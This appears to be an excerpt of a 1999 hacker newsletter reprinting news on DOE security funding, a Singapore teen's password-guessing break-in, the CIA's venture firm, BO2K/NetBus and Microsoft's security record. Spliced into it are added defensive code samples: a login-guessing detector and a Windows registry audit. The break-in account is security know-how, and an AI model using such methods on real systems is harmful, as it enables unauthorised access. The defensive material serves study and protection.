http://www.washingtonpost.com/wp-srv/WPcap/1999-09/29/007r-092999-idx.html
DOE Loses $35 Million for Cyber Security
By Walter Pincus and Vernon Loeb
Washington Post Staff Writers
Wednesday, September 29, 1999; Page A18
The Senate yesterday passed an energy appropriations bill that omits $35
million requested by Energy Secretary Bill Richardson for increased
computer security. The money was eliminated despite months of heated
debate over suspected Chinese espionage, during which leading Republicans
accused the Clinton administration of foot-dragging on security.
Richardson, traveling overseas, issued a statement charging that Congress
was withholding "important tools needed to implement security reform" that
Congress itself had demanded.
Without the $35 million, Richardson said, "it will be impossible to provide
real-time cyber intrusion detection and protection for 70 Energy Department
sites."
The money was eliminated by a House-Senate conference reconciling
differences between the initial versions of the bill passed by the two
chambers. A member of the conference committee, who requested
anonymity, said the $35 million was eliminated because members "want to
see management reform" before they approve a huge funding increase.
The committee member noted that Richardson is developing a $450 million
cyber security proposal for fiscal 2001. It would include money to replace all
personal computers used in classified programs with machines that do not
have floppy disk drives, and thus cannot easily be downloaded.
Congress's action leaves the department with the $2 million it originally
sought for computer security before suspected Chinese espionage came to
dominate political debate in Washington last spring.
Cyber security, in particular, became a major concern after it was
discovered that the government's prime espionage suspect at the Los
Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had
downloaded classified information to his unclassified computer. Lee, who
denies passing secrets to China, was fired but has not been charged with any
crime.
Meanwhile, the Energy Department's director of counterintelligence, Edward
J. Curran, acknowledged yesterday that he recommended his brother, a
retired police detective, for a $70-an-hour temporary job reviewing
counterintelligence operations at the department's three nuclear weapons
laboratories.
But he said the department's inspector general determined that his
recommendation did not violate federal conflict-of-interest statutes. "I
recommended my brother, yes, but he does not work directly for me,"
Curran said.
Michael Curran, a veteran of 27 years as a detective for the Waterfront
Commission of New York Harbor, has participated in a two-week
counterintelligence inspection at Lawrence Livermore National
Laboratory in California and is now part of a nine-member team reviewing
security at the Los Alamos lab in New Mexico.
All told, he will work about six weeks this fall, Edward Curran said, and will
participate in additional counterintelligence inspections at Energy Department
facilities next year.
© Copyright 1999 The Washington Post Company
@HWA
24.0 California Proposes Email Eavesdropping Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Simple Nomad
Currently most employers can read their employee's
email, with very few considering the privacy of their
employees. California Governor Gray Davis is considering
a bill that would require a company to have a written
policy regarding email eavesdropping before the
employer can actually read their employee's email.
San Francisco Examiner
http://199.97.97.16/contWriter/cnd7/1999/09/28/cndin/8639-0375-pat_nytimes.html
these guys have some funky shit html so i couldn't (easily) copy it here - Ed
@HWA
25.0 Singaporean Boy Sentenced to 12 Months
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by no0ne
12 months probation and 100 hours of community
service was the penalty imposed on a 15 year old boy
who electronically broke into the internet site of the
"Television Corporation of Singapore". The Myanmar
citizen is believed to be the first one to appear in a
Singaporean court for such an offense. The break-in
occurred last June when the boy saw a TV ad showing
the TV company's web site address and tried various
usernames and passwords in an effort to get into the
firm's server. He got in using "news" for both fields.
(Someone should punish the admin of the site as well
for having such crappy security.)
The Straits Times
http://straitstimes.asia1.com/cyb/cyb4_0929.html
SEP 29 1999
Teen sentenced for hacking into
TCS site
By KAREN WONG
A 15-YEAR-OLD boy was sentenced to 12 months'
probation and 100 hours of community service by the
Juvenile Court yesterday for hacking into the Television
Corporation of Singapore's (TCS) Internet site in June this
year.
The boy, who cannot be named, is believed to be the first
juvenile here to appear in court for such an offence.
His case came up on the same day The Straits Times
reported that another TCS website had been hacked into
early on Monday morning. The culprit in the second
hacking has not been caught yet.
District Judge Mark Tay Swee Keng stressed that the
court took a serious view of such cases. However, in
view of the boy's background -- he neither drinks alcohol,
smokes nor takes drugs, and also does not keep late hours
-- a bond would not be imposed on his parents.
His father is a product engineer and his mother is a
housewife. Both were in court yesterday. The judge did
not impose any curfew on the boy, who goes to a
neighbourhood school. He said the parents were already
ensuring that he got home by 6 pm.
The court heard that TCS had asked the boy to apologise
in writing and the apology has been posted on the TCS
site. Last month, the boy, a Myanmar national, had
pleaded guilty to four counts of unauthorised entry and
password disclosure.
The court had earlier heard that on June 15 this year, the
Secondary 2 boy was watching TV at home when he saw
an advertisement showing the address
www.mediacity.com.sg
He decided to visit the website and then tried various user
names and passwords to get into the Mediacity server.
He succeeded when he used "news" as the user name
and password. He then started exploring the directories
and files.
Then he told an 18-year-old youth whom he had met
chatting on the Internet, that the server had security
weaknesses and gave him the password. The older boy,
an O-level student in a private school, logged on too.
The younger boy then found a file containing all the
authorised user names and their corresponding encrypted
passwords. He passed them on to the older boy and both
used them.
The court heard that the younger boy only browsed
through the site. The older boy's case is pending.
Due to the hacking, TCS, which reported that some of its
pages had been replaced by pages containing obscene
words, had to shut the server down for about 10 hours.
About 80 man-hours went into restoring the site.
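The intrusion the court described needed nothing more than an account whose password equalled its name and a server that let a visitor keep guessing. Two controls would have stopped it, and what follows is an added example of both, not code from TCS, Mediacity or The Straits Times: a credential policy check that rejects a password identical to its username, and a detector that reads a syslog-style login log (the line format and the log lines below are constructed for this example, not a real server's log) and raises an alert when one source fails repeatedly inside a short window, with a second, louder alert if that same source then succeeds, which is what a guessed password looks like from the server's side.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample login log in an assumed syslog-style format.
# Source 203.0.113.7 walks through usernames and gets in as "news";
# source 198.51.100.9 is an ordinary user who mistyped once.
SAMPLE_LOG = """\
Jun 15 21:03:11 www login: FAILED user=admin from=203.0.113.7
Jun 15 21:03:14 www login: FAILED user=root from=203.0.113.7
Jun 15 21:03:20 www login: FAILED user=webmaster from=203.0.113.7
Jun 15 21:03:27 www login: FAILED user=guest from=203.0.113.7
Jun 15 21:03:33 www login: FAILED user=news from=203.0.113.7
Jun 15 21:03:40 www login: OK user=news from=203.0.113.7
Jun 15 21:10:02 www login: FAILED user=editor from=198.51.100.9
Jun 15 21:45:59 www login: OK user=editor from=198.51.100.9
"""

_LOG = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ login: "
    r"(?P<result>FAILED|OK) user=(?P<user>\S+) from=(?P<src>\S+)$"
)


def parse_log(text, year=1999):
    """Return (timestamp, result, user, src) tuples; unparseable lines are skipped.
    Syslog lines carry no year, so the caller supplies one."""
    events = []
    for line in text.splitlines():
        m = _LOG.match(line)
        if not m:
            continue
        ts = datetime.strptime("%s %d" % (m.group("ts"), year), "%b %d %H:%M:%S %Y")
        events.append((ts, m.group("result"), m.group("user"), m.group("src")))
    return events


def detect_guessing(text, threshold=4, window_seconds=300):
    """Alert once per source that reaches `threshold` failures inside the
    window, and again for every success from a source that has tripped."""
    recent = defaultdict(deque)   # src -> timestamps of failures still in window
    tripped = set()
    alerts = []
    for ts, result, user, src in parse_log(text):
        q = recent[src]
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()           # forget failures older than the window
        if result == "FAILED":
            q.append(ts)
            if len(q) >= threshold and src not in tripped:
                tripped.add(src)
                alerts.append(("guessing", src, user, ts))
        elif src in tripped:
            # A success after a burst of failures is the guessed credential.
            alerts.append(("guessed-credential", src, user, ts))
    return alerts


def audit_credential(username, password, banned=("password", "guest", "admin")):
    """Return the policy violations for a credential; an empty list passes."""
    reasons = []
    if password.lower() == username.lower():
        reasons.append("password equals username")
    if len(password) < 8:
        reasons.append("shorter than 8 characters")
    if password.lower() in banned:
        reasons.append("common default")
    return reasons


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print("%s: %s user=%s at %s" % alert)
    print("news/news:", audit_credential("news", "news"))
```

Against the sample the detector flags 203.0.113.7 at its fourth failure and again when "news" logs in; the second source, one mistyped password followed by a success half an hour later, stays quiet, which is the kind of normal traffic a count-only rule with no window would misfire on. The policy check is the cheaper control: it rejects "news"/"news" before it ever reaches a password file.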
@HWA
26.0 CIA Funds Startup VC Firm
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
Congress has appropriated $28 million to fund a venture
capital firm with the name of 'In-Q-It'. The firm will use
the money to invest in small high-tech companies who
are working on promising technological projects that
could benefit the CIA. The new corporation will be
completely independent of the CIA and will be headed
by Gilman Louie, founder of MicroProse and ex-executive
of Hasbro.
Nando Times
http://www.techserver.com/noframes/story/0,2294,500039359-500063830-500088357-0,00.html
Wired
http://www.wired.com/news/news/politics/story/22004.html
CIA sets up firm to invest in intelligence technologies
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
By TOM RAUM
WASHINGTON (September 29, 1999 12:09 p.m. EDT http://www.nandotimes.com) - The CIA, not wanting to miss the boat on the Internet age or be outsmarted
by tech-savvy adversaries, is teaming up with Silicon Valley entrepreneurs to invest in companies developing computer technologies that could help with
intelligence gathering.
Forgoing its usual clandestine ways, the agency has set up its own venture capital firm - with money appropriated by Congress - with offices in
Washington and Palo Alto, Calif. It will invest in promising new start-up hi-tech companies.
The CIA picked a fanciful name for the new company: In-Q-It. The "In" stands for intelligence. The "It" stands for information technology. And the Q?
That's the code name of the James Bond character who comes up with all the gadgets that the fictional British spy uses.
"We do have a sense of humor," Central Intelligence Agency spokesman Bill Harlow said Wednesday, confirming the existence of the new company.
Harlow said the venture capital company "is clearly tied to us, but they make a big point of being independent."
The venture, first reported by The Washington Post and The New York Times in Wednesday's editions, was actually set up last February as a nonprofit
organization.
But it is just now getting organized, with its own board of directors, according to the new chief executive officer, Gilman Louie.
Louie said in an interview that the company would be small, with about 20 to 25 employees, and is being started with $28 million appropriated by
Congress last year as part of the classified budget for the agency.
Both Louie and the CIA said the venture capital company would only work on unclassified projects.
Mainly, In-Q-It will invest in some high-tech companies and form joint ventures with other ones where the companies are working on promising
technological projects that could benefit the CIA.
This includes ways of helping the CIA to use the Internet more effectively and securely.
It also will try to find promising technologies that will help the CIA better use the information it already possesses in a variety of forms, from paper to
computer files.
He cited the May 7 bombing of the Chinese embassy in Yugoslavia - a target picked by the CIA - as "the manifestation of the worst result that could
happen if you don't have all your information lined up."
Louie, 39, founded his own electronic game company - MicroProse Inc. - that was later bought by Hasbro. At Hasbro, Louie has been an executive with
the toy company's online business group.
He said he has no experience in espionage "and I want to keep it that way."
The company's board of directors includes John Seely Brown, director of the Xerox Corporation's Palo Alto Research Center; Norm Augustine, chairman
of Lockheed Martin; William Perry, the former defense secretary; and Jeong Kim of Lucent.
Wired;
Valley VCs to CIA: 'Huh?'
by James Glave
12:30 p.m. 29.Sep.99.PDT
The CIA's new venture capital project isn't going to come up with anything that the free market won't do on its own.
That's the opinion of venture capitalists and policy watchers, some of whom lampooned a new effort to develop spy technology in the heart of
regulation-wary Silicon Valley.
"I am not familiar with what it costs to create those exploding pens," Benchmark Capital general partner Kevin Harvey said.
The New York Times reported Wednesday that the new, non-profit VC company, In-Q-It, will be bankrolled with US$28 million appropriated for the
spy agency's budget. There is already one office in Washington, with another planned for Northern California.
But the tech venture capital community said that the plan is right out of a movie.
"That's R and D that is pretty far afield from what we do here," Harvey said, adding that government involvement in venture capital is "not a great
idea."
In-Q-It CEO Gilman Louie, a veteran of the computer game and toy industry, told the newspaper that the new company is designed to move
information technology to the agency more quickly than traditional government procurement processes allow.
Neither Louie nor the CIA could be reached for comment. Meanwhile, VCs and policy watchers scoffed at the arrangement.
"It looks pretty outrageous when we have healthy capital markets and one of the most innovative technology sectors in the world," Erick
Gustafson, technology policy director at the free-market focused Citizens For a Sound Economy, said.
"If you have $28 million, do you put it in using the CIA as the manager, or do you use private existing means of research? The existing means of
research would prove more efficient," Gustafson said.
The CIA's new company aims to cut through the sluggish technology procurement process by directly funding companies that are creating new
innovations in the fields of privacy and security.
But one VC said that the agency should stick to the current scheme of contracting out for products.
"It seems like they would only add layers to [the procurement bureaucracy]," said Gregory Barr of Fleet Equity Partners.
"It doesn't seem to make a lot of sense," he said, adding that the arrangements could set up all manner of conflicts of interest between investor
and developer.
Barr said that Louie, who has already left his position as a Hasbro executive, may not have been the best choice for the job.
"If you are looking for a successful VC, I am not sure someone from a toy company is the best person. [Louie] is someone from the product side,
not the investment side," he said.
Andrew Anker, a partner with August Capital, described the project as interesting but misdirected.
"There is a huge glut of money out there," Anker said. "And there are a lot of ideas out there. The question is more, 'What does the marketplace
want?'"
"Say the CIA said that wrist phones are critical for our agents and we will buy 10,000 of them. As long as there is a consumer market for it, a
bunch of entrepreneurs will go down to Sand Hill Road and seek financing to get it."
@HWA
27.0 BO2K, NetBus, and now WinWhatWhere
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
So what exactly are the features of a remote admin tool
that cause it to be labeled as malicious by AntiVirus
vendors? WinWhatWhere, which was actually built to
spy on people, avoids this hapless moniker while
commercial software such as NetBus and freeware such
as BO2K get branded as evil malicious code. What the
hell is going on here?
ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,2343782,00.html
A bevy of Backdoor bad boys
By Kevin Poulsen, ZDTV
September 29, 1999 10:29 AM PT
Before flying to DC to cover InfowarCon '99 last month, I took a few minutes to download the
dread Back Orifice 2000, and then actually installed the malevolent masterpiece of cyberhorror on
my home PC, blatantly ignoring the advice of various security advisories and my antivirus software.
As you probably know by now, Back Orifice 2000-- BO2K to its friends -- is an evil program that
cyberterrorists can use to take complete control of your computer. They can read your email, wipe
out your hard drive, or send your mouse cursor careening around your screen like the planchette on
a demon-haunted Ouija board.
Villains can send the program as an email attachment to their enemies - perhaps disguised as an
electronic greeting card or a game. If the hapless victim opens the attachment, all is lost.
But there's another side to BO2K. If you're a network administrator, the program is well suited for
maintaining the computers on your network. If you're the family computer expert, you can send it to
your parents and use it to fix whatever minor Windows problems are vexing them this week. If
you're leaving town, you can install it on your own machine and use it to check in on your PC:
transfer a file that you forgot to bring with you, or capture frames from your Netcam and watch the
people burglarizing your apartment.
In short, BO2K is actually a useful and free remote administration tool. The program gained its dark
image primarily from the showmanship of its creators: the cyberspace bad boys (and gal) known
collectively as "The Cult of the Dead Cow." They released BO2K, not in a dry corporate environ,
but in a flashy concert-like venue at the DefCon hacker convention. And the rock stars of the
underground taunt Microsoft and antivirus companies at every turn.
Meanwhile, another "evil" program is struggling to become mainstream. NetBus was created last
year by Swedish programmer Carl Fredrik Neikter, and it was originally designed for mischievous
fun - install it on a friend's machine and watch his amazement via his Netcam while you remotely
open and close his CD-ROM tray. It became an underground hit even before the original Back
Orifice made its high-profile appearance.
But Neikter never wanted to be a rebel. Now, partnered with UltraAccess Networks, he's
marketing a new version of his program as commercial shareware, and struggling to shake the
underground image.
Sadly, even charging for the software - a sure sign of legitimacy - hasn't completely removed the
cyberpunk taint from NetBus's reputation. Virtually all the major antivirus software makers - some of
whom sell their own remote administration tools - treat the $15 program as malicious code, a
practice UltraAccess founder Judd Spence calls anticompetitive.
"Basically," said Spence, "we're probably going to have to take everyone to court."
Last March, NetBus scored a prestigious "five cow" rating from TUCOWS, only to be yanked from
the software distributor's website a few days later after complaints came in about their distribution of
malicious code.
Oddly enough, software intended for genuinely evil purposes doesn't seem to be as controversial.
Earlier this month, a company called WinWhatWhere released version 2.0 of its Investigator
software, a program specifically designed to spy on hapless PC users. It can record every keystroke
a user types and, according to the company's press release, includes "an optional Silent Install utility
for [sic] discrete deployment."
How has Investigator eluded the dire warnings and countermeasures that accompany Back Orifice
and NetBus? It is targeted specifically to companies who want to spy on their employees. It seems
that's something that just doesn't warrant a security advisory.
@HWA
28.0 Microsoft, Insecure or Just More Prevalent?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Elinor
With the recent holes found in IE, Hotmail, NT, Office
and other Microsoft products many people think that
Microsoft just writes insecure code. Microsoft says that
their code is no worse than anyone else's but that what
they write is looked at by a lot more people. (This
article gives a good overview of a lot of the technical
hurdles Microsoft faces.)
CNN
http://www.cnn.com/TECH/computing/9909/28/ms.security.idg/index.html
Microsoft: Bad security, or bad press?
September 28, 1999
Web posted at: 12:12 p.m. EDT (1612 GMT)
by Elinor Mills Abreu
(IDG) -- Microsoft has been getting a lot of bad press lately over security vulnerabilities in
Internet Explorer, Office and Hotmail, among other software. Security concerns with Windows NT
even prompted the U.S. Army to move its hacked Web site from NT servers to WebStar servers running
the MacOS.
But does this mean Microsoft software is less secure than other software?
A variety of experts think so, claiming the software giant is offering more
functionality at the expense of security. Microsoft defends its strategy, saying
users want ease-of-use and more features.
And several users said they approve of that strategy. In the end, it's up to
users to let the company know whether they are happy with the trade-off or if
they want defaults to be set for greater security and more hand-holding.
Another option users have is to switch software like the Army did. The Army cited the fact that
the MacOS doesn't have support for remote logons or a command shell to provide remote access via
a DOS prompt.
Scott Culp, security product manager for NT Server, says NT provides tools to disable remote
logons and that nearly all Unix systems have a command shell. "Whether or not an operating system
has a remote command shell says nothing about its ability to withstand other attacks such as
denial of service attacks."
Microsoft software experiences the same types of security woes other
platforms do but its troubles are more prominent because more people are
using Microsoft products than products from other software vendors, Culp
says.
Without question, Microsoft's dominance in the operating system market plays
a big part in the headlines - the sheer number of users of the software makes
it an easy and huge target for hackers, increases the chances that security
flaws will be discovered and heightens the impact from spreading viruses.
Hegemony not the only issue
But numerous experts, analysts and hackers say Microsoft's hegemony isn't the only problem.
"They certainly don't have a very secure environment. There are so many holes in the Microsoft
environment that any [worthy] hacker ... is going to figure out how to break in," says Anne
Thomas, a senior analyst at the Patricia Seybold Group in Boston.
"It's the dominant operating system out there, so it's going to attract the attention. On the
other hand, Windows has extremely sloppy security," says Bruce Schneier, author of Applied
Cryptography and a founder and chief technology officer of Counterpane Internet Security, a
provider of managed security services in Minneapolis, Minn.
What often upsets people is that Microsoft hasn't learned from the mistakes made in older
operating systems, notes Jon McCown, technical director of network security at the International
Computer Security Association in Reston, Va. Categories of attack that are well understood are
cropping up in Windows.
"They're doing a forthright job of addressing them, but there's a concern about what we don't
know about yet; what's still in the operating system or in the servers that will become an
issue."
Evolution of Windows
It has been suggested that Microsoft's security weaknesses have to do with the
evolution of Windows from a single-user desktop operating system to a
multiuser operating system.
Windows is desktop software that "was never really intended as network
architecture," says Jeff Tarter, editor and publisher of Softletter, based in
Watertown, Mass. However, Microsoft is rewriting a lot of the code for
Windows 2000, as it did for NT, which should help make it more secure, he
adds.
Culp acknowledges that the NT security architecture is more "robust" than its
predecessors.
"NT is an entirely different animal altogether," he says. "It was built from the
ground up with a brand new architecture ... to be used as an enterprise class
operating system with security as a primary requirement." But Culp also
defended the strength of all Windows in general, saying security was "woven"
into the operating system rather than "bolted on" afterward.
Others are skeptical
"Microsoft's operating system was never designed with security in mind,"
Schneier says. "For Microsoft, security is always an afterthought."
One example is Microsoft's implementation of file-sharing networking services
in Windows 95 and 98, says Tweety Fish, a member of the hacker group Cult
of the Dead Cow. Where previous versions of Windows weren't designed for
networked computers, Microsoft made TCP/IP file sharing the default on
Windows 95 and 98 without explaining the consequences of sharing files over
the Internet to users who weren't savvy about network security, he wrote in
an e-mail response to questions. Microsoft could have also used a more
secure method for file sharing.
Trade-off: Security vs. functionality
Factors listed by experts interviewed over the past few weeks that lead to
security problems for Microsoft include:
-- The company's reliance on the Component Object Model specification for
running application components on multiple platforms, specifically ActiveX
controls, which are reusable component program objects similar to Java
applets and which can be attached to an e-mail or downloaded from a Web
site. The most dangerous are pre-installed ActiveX controls which contain
functions that can be executed on a computer but run without digital signatures
used by other ActiveX controls.
-- NT's "insecure" default installation, which assumes the user or network
administrator will be knowledgeable enough to change the settings to a higher
security level.
-- The company's use of executable code in data files in Microsoft Office
products, primarily macros, which are saved commands that can be recalled
with a single command or keystroke.
-- The company's tight integration of its applications with its operating system,
and lack of tight administration control in the operating system over privileges
and access controls, which allow applications and macros to execute other
programs.
-- The company's use of hidden and/or undocumented APIs or features that
can give hackers back doors into Microsoft applications and which don't get
the scrutiny of code made public to developers.
-- The company's faulty implementation of the Point-to-Point Tunneling
Protocol, which enables the extension of corporate networks through private
"tunnels" over the Internet. It is still vulnerable to "offline password-guessing
attacks from hacker tools such as L0phtcrack," according to Schneier's report
at http://www.counterpane.com/pptp.html.
In general, the experts agreed that these technologies provide greater ease of
use and functionality to users but say they also open the system up to security
vulnerabilities. Microsoft counters that many of the features can be either
disabled, like macros and ActiveX controls, or made more secure with the use
of third-party specialized software.
COM opens the door
Thomas of the Patricia Seybold Group says Microsoft's main problem has to
do with COM, which "opens the system up to all kinds of nasty, dangerous
situations." COM's integration with Microsoft Word allowed the prolific
Melissa virus to spread so quickly in March, she says.
"It's a hard trade-off," Thomas says. "You can do without this incredibly
powerful technology that makes your system so much more automatic, or you
can shut off that automatic capability and not have that tight integration, but
have protection against viruses."
Java applets are designed to minimize security violations by being executed in
a "sandbox" - a secure area of the computer that isolates Java applets and
keeps them from damaging files - whereas ActiveX controls rely on the applet
being signed by the creator, whom the user will, ideally, know and trust.
Dangers of ActiveX
Allowing remote systems to run arbitrary code on a local system is a "massive
security risk," hacker Tweety Fish wrote. "It's been proven time and time
again that Microsoft's implementation of ActiveX can be broken pretty easily
..."
ActiveX controls can be automatically launched when a user goes to an
HTML page or clicks on an e-mail attachment. They can be used to do
malicious things like run programs on a user's computer, read system files and
create files, among other things, according to Richard M. Smith, a security
expert and president of Phar Lap Software, a Cambridge, Mass. company that
makes real-time operating systems for embedded systems.
"I don't think anybody right now, frankly, has a handle on the scope of the
[ActiveX] problem," Smith says. "ActiveX really opens up a can of worms."
Microsoft has released an average of about two to three security patches a
month over the past year, Smith says, adding that he suspects that most
Microsoft users have not downloaded them. Within the past year, while
Microsoft has had about 10 separate bugs in IE that enable code in messages
to read files, Netscape has had one, according to Smith.
Default "open" or "closed"
Microsoft's Culp argued that COM does not pose a security risk, and
countered that Microsoft allows users to configure their software to give them
the balance of functionality and security.
For instance, users can disable macros and ActiveX controls, and a new
security patch for Office lets users decide whether to allow Office documents
to launch automatically when they're hosted on Web sites, he says. In addition,
a new security configuration tool kit that ships with Windows 2000 will allow
users to customize their software to the security level they desire, Culp says.
"We don't force anybody into a particular stance," he says. "We provide tools
to allow you to make that decision."
But several experts say Microsoft should ship its software in the highest
security mode rather than a more risky "open" default.
"The operating system should be fail safe enough [especially on a server
operating system like NT] that a nonadministrator user has to work pretty hard
to allow the machine to be compromised," hacker Tweety Fish wrote. "The
fact that macros in Microsoft Word can run any DOS executable and access
any system function is a massive security hole, and for Microsoft to claim
anything else is specious marketing spin."
Users can't make knowledgeable choices of what features to disable if they
don't fully understand the dangers involved, Tweety Fish says. Instead, they
should feel confident that their software is secure and as they start to
understand the risks they can modify the security themselves.
Eric Schultze, director of Microsoft Content for Security-Focus, which operates
a portal site at http://www.securityfocus.com, specifically complained that
Windows NT's default installation can allow hackers to get a lot of
information, including access to "blank administrator passwords, disabled
security policies, and weak permissions over critical system files."
But Microsoft can't be expected to make the security decisions for its users,
particularly when opting for greater security for some users at the expense of
less functionality for others, Culp argues.
"There's always a trade-off between convenience and security," he says.
"Everybody has a proper point where they balance security against usability.
Any two people are going to have a different point that's right for them."
Virtually all general-purpose operating systems default to usability over
security rather than in a "locked down" mode.
Russ Cooper, editor of the NT Bugtraq mailing list
(www.securityadvice.com), defended macros. "Although relatively insecure,
[macros are] still very much in demand. ... Internet technologies are not
designed to be secure. They're designed to be interactive."
Cooper says users should be more responsible. "Microsoft is providing us with
tools that will help us, but at the same time we as consumers are not taking the
responsibility ... to learn basics about using this stuff," he says.
But other experts argue that Microsoft has a responsibility to provide greater
user safety than it is now, even if it might take more time and money to
develop products that are more secure.
"In the car industry they have to build with safety in mind. Car makers couldn't
get away with this," said Avi Rubin, a principal member of the technical staff
at AT&T Labs in Florham Park, N.J., and author of The Web Security
Sourcebook. "They're more concerned with the bottom line and profits, and
that's upsetting."
"Setting the default to dangerous doesn't work in any other industry," Schneier of Counterpane
says.
Business decision
Offering zero-administration capabilities and features that, in their default
mode, reduce the level of security in the software, is a strategic decision on
Microsoft's part, the experts say.
Phar Lap's Smith questioned the need for some of the features Microsoft
provides at the expense of security, saying he'd like to turn them off but
doesn't always get that option.
To simplify things for the administrator, Microsoft is promoting ease-of-use
over "robustness of control," hacker Tweety Fish says. However, if the
operating system doesn't adequately handle the behind-the-scenes work,
security holes can be opened up without the administrator's awareness.
"Unix variants have a long way to go to match the ease of use of NT, but on
the other hand, with a little bit of knowledge [in Unix], you can know
EXACTLY what your machine is doing, which is the most important aspect of
server administration," Tweety Fish wrote.
Meanwhile, Schultze of Security-Focus predicted that security problems with
NT and its predecessors will pale in comparison to security issues that will
arise with Windows 2000, which will offer more complexity to secure. "There
will be more opportunities for things to go wrong," he says.
For instance, Schultze says Windows 2000 defaults to enabling a host of
encryption authentication schemes, including LanMan, which he says is easy
to decrypt, and users have to go in and disable any schemes they don't want to
use. However, the chances that an administrator won't tighten the system
down are great.
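The two "open by default" settings the critics keep returning to above, LanMan authentication left enabled and Office macros allowed to run, can both be audited from the registry. The script below is an added example written for this page, not code from the article or from Microsoft. It assumes a Windows host and uses the registry locations documented for Windows NT/2000 (LmCompatibilityLevel under the Lsa key, where an absent value means level 0) and for Office 2000 (a per-user Security\Level value under Office\9.0\<application>); the level-to-meaning tables are the documented ones.

```powershell
# Added audit example (not from the article): reports whether two of the
# permissive defaults discussed above are still in effect on this host.
# Run from an elevated PowerShell prompt on the machine being checked.

# LmCompatibilityLevel meanings as documented for NT 4.0 / Windows 2000.
# When the value is absent the system behaves as level 0.
$lmMeaning = @{
    0 = 'Send LM & NTLM responses; never NTLMv2 (default when value is absent)'
    1 = 'Send LM & NTLM; use NTLMv2 session security if negotiated'
    2 = 'Send NTLM response only'
    3 = 'Send NTLMv2 response only'
    4 = 'Send NTLMv2 only; refuse LM (domain controllers)'
    5 = 'Send NTLMv2 only; refuse LM & NTLM (domain controllers)'
}

function Get-LmCompatibilityLevel {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $value = (Get-ItemProperty -Path $key -Name LmCompatibilityLevel `
              -ErrorAction SilentlyContinue).LmCompatibilityLevel
    if ($null -eq $value) { return 0 }   # absent value == documented default 0
    return [int]$value
}

function Test-LmHardened {
    param([int]$Level)
    # Levels 0-2 still send LM or NTLMv1 responses, which is the exposure
    # Schultze describes as "easy to decrypt"; 3 and above send NTLMv2 only.
    return $Level -ge 3
}

# Office 2000 macro security levels: 1 = Low, 2 = Medium (prompt),
# 3 = High (only digitally signed macros from trusted sources run).
$macroMeaning = @{
    1 = 'Low (all macros run)'
    2 = 'Medium (prompt before running)'
    3 = 'High (signed and trusted sources only)'
}

function Get-OfficeMacroLevel {
    param([string]$App)   # e.g. Word, Excel
    $key = "HKCU:\Software\Microsoft\Office\9.0\$App\Security"
    $value = (Get-ItemProperty -Path $key -Name Level `
              -ErrorAction SilentlyContinue).Level
    if ($null -eq $value) { return $null }  # app not installed or never configured
    return [int]$value
}

$lm = Get-LmCompatibilityLevel
Write-Output ("LmCompatibilityLevel = {0}: {1}" -f $lm, $lmMeaning[$lm])
if (-not (Test-LmHardened $lm)) {
    Write-Output "  -> LM/NTLMv1 responses still in use; consider level 3 or higher"
}

foreach ($app in 'Word', 'Excel') {
    $lvl = Get-OfficeMacroLevel $app
    if ($null -eq $lvl) {
        Write-Output ("{0}: macro security level not set (or application not installed)" -f $app)
        continue
    }
    Write-Output ("{0}: macro security {1}" -f $app, $macroMeaning[$lvl])
    if ($lvl -lt 3) {
        Write-Output "  -> macros can run without a trusted digital signature"
    }
}
```

The point of treating an absent LmCompatibilityLevel as level 0 is that a freshly installed machine has no such value at all, so a check that only looks for an explicit weak setting would report the default installation as clean.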
Culp disputes this, noting that in Windows 2000 Microsoft is using security
standards like the Kerberos protocol, putting the software to heavy testing
including specific attempts to break into it, and has been beta testing it for two
years.
Tight integration, loose administration, hidden APIs
Microsoft prides itself on the tight integration of its applications with its
operating system - a matter that sparked an antitrust lawsuit by the U.S.
government. But while this integration lets users easily work between the
programs, it also makes it easy for flaws in one application to affect the entire
system, according to Rubin at AT&T.
"There are no security perimeters around any of the applications," he says.
"The fact that Word macros can access an Excel database and Excel files can
launch other programs with a 'call function'" in Outlook, for example, creates a
hacker-friendly environment.
Part of the problem is Microsoft's use of so-called hidden APIs, which are
kept secret from third-party developers, Rubin says. These allow Microsoft
developers to take shortcuts but can also lead to security problems because
they aren't scrutinized as public ones are.
Hacker Tweety Fish accuses Microsoft of historically implementing "horribly
insecure" APIs.
"Both Back Orifice and BO2K were built using standard Microsoft APIs;
every piece of scary, worrisome functionality is BUILT IN to Microsoft
Windows," he wrote. "If these APIs were open to public scrutiny, I doubt such
terrible ideas as WNetEnumCachedPasswords [which cheerfully reveals all
cached passwords on the system] would exist."
Microsoft's Culp couldn't categorically deny that the company uses hidden
APIs, but in general he argued that integration is necessary to give advanced
products to users.
"Microsoft doesn't believe that the way to provide security is to make our
applications incompatible with each other," he says. "That's not what our
customers want. They want seamless integration."
Tightly integrated applications provide productivity improvements and can still
be secured, Culp says. For example, Office 2000 macros can be disabled or
allowed to run: automatically, only when digitally signed, or only when signed
from trusted sources.
PR treatment
Technical debates aside, most of the critics complained that Microsoft often
treats security issues like PR problems that need to be averted and not
resolved.
The main security problem is "marketing driven product design at Microsoft,
and the fact that they will not consider any given security risk a problem until it
becomes a problem in the press," hacker Tweety Fish says.
He and others complained that Microsoft often denies security problems
before being forced to address them with a fix after they are made public, and
that the company tries to minimize their scope and put a spin on them.
For instance, the company downplayed the Jet/ODBC [open database
connectivity] exploit in a Microsoft Security Bulletin over a year ago so that
"almost nobody" bothered to install the patch and users were caught off-guard
when it made headlines recently, the hacker says.
The company downplays the extent of a problem by not mentioning all the
situations in which it could arise, saying it is limited to only specific situations
